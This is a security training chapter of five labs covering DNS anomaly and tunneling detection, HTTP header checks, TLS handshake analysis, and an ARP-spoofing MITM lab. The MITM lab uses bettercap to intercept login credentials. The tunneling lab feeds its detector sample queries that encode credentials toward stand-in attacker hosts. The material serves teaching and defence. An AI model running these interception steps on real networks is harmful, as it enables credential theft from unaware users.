Part III: Hands-On Labs Chapter 5

Application Attack Labs

DNS attacks, HTTP security testing, and application protocol security exercises

Chapter 5: Application Attack Labs

Lab Overview

These labs explore application layer attacks against DNS, HTTP, and other protocols.

Lab 5.1: DNS Query Analysis

Objective

Analyze DNS traffic and identify anomalies.

Difficulty: Beginner | Time: 30 minutes

Instructions

Part 1: Capture DNS Traffic

# Capture DNS
tshark -i eth0 -f "udp port 53" -w dns.pcap &

# Generate various queries
dig google.com
dig google.com AAAA
dig google.com MX
dig google.com TXT
dig google.com ANY

Part 2: Analyze Query Types

Wireshark filters:

dns.qry.type == 1    # A records
dns.qry.type == 28   # AAAA records
dns.qry.type == 15   # MX records
dns.qry.type == 16   # TXT records
dns.qry.type == 255  # ANY (potential abuse)

Part 3: Identify Anomalies

DNS Anomaly Indicators:
- Very long query names (> 50 chars)
- High-entropy subdomains
- Unusual TXT record queries
- High query rate to single domain

Verification

Captured various DNS query types
Created filters for each type
Identified potential anomaly indicators

Lab 5.2: DNS Tunneling Detection

Objective

Detect DNS tunneling activity.

Difficulty: Intermediate | Time: 45 minutes

Instructions

Part 1: Understand Tunneling Patterns

DNS Tunneling Indicators:

Normal query: www.google.com
Tunneled data: aGVsbG93b3JsZA.tunnel.evil.com

Characteristics:
- Long subdomain labels (encoded data)
- Base64-like patterns
- High query frequency
- TXT record responses

Part 2: Analysis Script

#!/usr/bin/env python3
"""
DNS Tunneling Detector
"""
import math
from collections import Counter

def entropy(s):
    """Calculate Shannon entropy"""
    if not s:
        return 0
    counter = Counter(s)
    length = len(s)
    return -sum((count/length) * math.log2(count/length) 
                for count in counter.values())

def analyze_query(query):
    """Analyze DNS query for tunneling indicators"""
    # Extract subdomain (everything before second-level domain)
    parts = query.split('.')
    if len(parts) >= 3:
        subdomain = '.'.join(parts[:-2])
    else:
        subdomain = parts[0]
    
    # Calculate metrics
    length = len(subdomain)
    ent = entropy(subdomain)
    
    # Thresholds (tune based on environment)
    suspicious = False
    if length > 30:
        suspicious = True
        print(f"[!] Long subdomain ({length} chars): {query}")
    if ent > 3.5:
        suspicious = True
        print(f"[!] High entropy ({ent:.2f}): {query}")
    
    return suspicious

# Example analysis
test_queries = [
    "www.google.com",
    "mail.example.org",
    "aGVsbG93b3JsZHRoaXNpc2FzZWNyZXQ.tunnel.evil.com",
    "dXNlcm5hbWU9YWRtaW4mcGFzc3dvcmQ9c2VjcmV0.c2.attacker.com"
]

for q in test_queries:
    analyze_query(q)

Part 3: Live Analysis

# Capture and analyze live DNS
tshark -i eth0 -f "udp port 53" -T fields -e dns.qry.name | \
  while read query; do
    length=$(echo $query | wc -c)
    if [ $length -gt 50 ]; then
      echo "[!] Suspicious: $query"
    fi
  done

Verification

Understood tunneling patterns
Ran analysis script
Identified encoded queries

Lab 5.3: HTTP Security Testing

Objective

Test HTTP security headers and identify vulnerabilities.

Difficulty: Intermediate | Time: 45 minutes

Instructions

Part 1: Header Analysis

# Check security headers
curl -I https://example.com

# Look for:
# Strict-Transport-Security
# Content-Security-Policy
# X-Content-Type-Options
# X-Frame-Options
# X-XSS-Protection

Part 2: Security Header Checklist

#!/usr/bin/env python3
"""
HTTP Security Header Checker
"""
import requests

def check_headers(url):
    """Check security headers"""
    try:
        r = requests.head(url, timeout=10)
    except Exception as e:
        print(f"Error: {e}")
        return
    
    headers = r.headers
    
    checks = {
        'Strict-Transport-Security': 'HSTS',
        'Content-Security-Policy': 'CSP',
        'X-Content-Type-Options': 'X-Content-Type-Options',
        'X-Frame-Options': 'X-Frame-Options',
        'X-XSS-Protection': 'XSS Protection'
    }
    
    print(f"\nSecurity Headers for {url}:")
    print("=" * 50)
    
    for header, name in checks.items():
        if header in headers:
            print(f"[] {name}: {headers[header][:50]}")
        else:
            print(f"[✗] {name}: Missing")

# Test
check_headers("https://google.com")
check_headers("https://example.com")

Part 3: Manual Testing

# Test for directory listing
curl http://target/icons/

# Test for server info disclosure
curl -I http://target

# Test for HTTP methods
curl -X OPTIONS http://target -I

Verification

Checked security headers
Identified missing headers
Tested for information disclosure

Lab 5.4: MITM Position Attack

Objective

Achieve MITM and intercept application traffic.

Difficulty: Advanced | Time: 45 minutes

Warning

Only on your own isolated lab network.

Instructions

Part 1: Setup MITM

# Use bettercap (combines ARP spoof + sniffing)
sudo bettercap -iface eth0

» set arp.spoof.targets 192.168.1.100
» arp.spoof on
» net.sniff on

Part 2: Capture HTTP Credentials

# Bettercap auto-captures credentials
# Watch output for:
# [http.post] POST /login user=admin&pass=secret

# On victim, browse to HTTP site and login

Part 3: Analyze Captured Traffic

# Review bettercap log
# Or analyze pcap in Wireshark

# Filter: http.request.method == "POST"
# Follow HTTP stream
# Look for credentials in form data

Blue Team Perspective

Detection:
- ARP cache monitoring
- HTTPS everywhere
- Certificate validation
- Anomaly detection

Verification

Achieved MITM position
Captured HTTP credentials
Documented attack flow

Lab 5.5: TLS Analysis

Objective

Analyze TLS handshakes and identify security issues.

Difficulty: Intermediate | Time: 30 minutes

Instructions

Part 1: Capture TLS Handshake

# Capture TLS
tshark -i eth0 -f "tcp port 443" -w tls.pcap &

# Generate TLS traffic
curl -v https://example.com

Part 2: Analyze Handshake

Wireshark filters:

tls.handshake.type == 1  # ClientHello
tls.handshake.type == 2  # ServerHello
tls.handshake.type == 11 # Certificate

Examine:
- TLS version negotiated
- Cipher suite selected
- Certificate chain

Part 3: Check Certificate

# Command line certificate check
echo | openssl s_client -connect example.com:443 2>/dev/null | \
  openssl x509 -noout -dates -subject -issuer

# Check cipher suites supported
nmap --script ssl-enum-ciphers -p 443 example.com

Verification

Captured TLS handshake
Identified negotiated parameters
Verified certificate details

Lab Summary

Skills Acquired

DNS traffic analysis
Tunneling detection
HTTP security testing
MITM attack execution
TLS analysis

Defense Recommendations

Attack	Detection	Prevention
DNS Tunnel	Query analysis	DNS inspection
HTTP MITM	ARP monitoring	HTTPS/HSTS
Credential Theft	Anomaly detection	Encryption